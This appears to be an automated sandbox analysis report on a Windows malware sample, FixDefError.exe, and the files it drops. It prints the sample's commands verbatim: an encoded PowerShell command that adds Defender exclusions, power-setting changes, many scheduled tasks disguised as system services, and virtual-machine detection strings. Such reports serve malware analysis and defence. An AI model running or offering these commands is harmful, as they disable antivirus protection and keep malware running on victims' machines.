      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\FixDefError.exe TID: 5892Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 6068Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5948Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep count: 9137 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe TID: 3988Thread sleep time: -42200s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file
      Source: C:\Users\user\Desktop\FixDefError.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9137Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 30000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareM3X57C89Win32_VideoControllerL7AUS5NSVideoController120060621000000.000000-0007926944.display.infMSBDAV33ZTS67PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEWREGOHN99
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
      Source: svchost.exe, 00000024.00000002.515586506.0000023C61E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwareuser
      Source: svchost.exe, 00000024.00000002.516433522.0000023C61E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.516467984.000001EA20466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.516600617.0000025B84229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Encrypted powershell cmdline option found
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4aJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"Jump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4AJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Users\user\Desktop\FixDefError.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
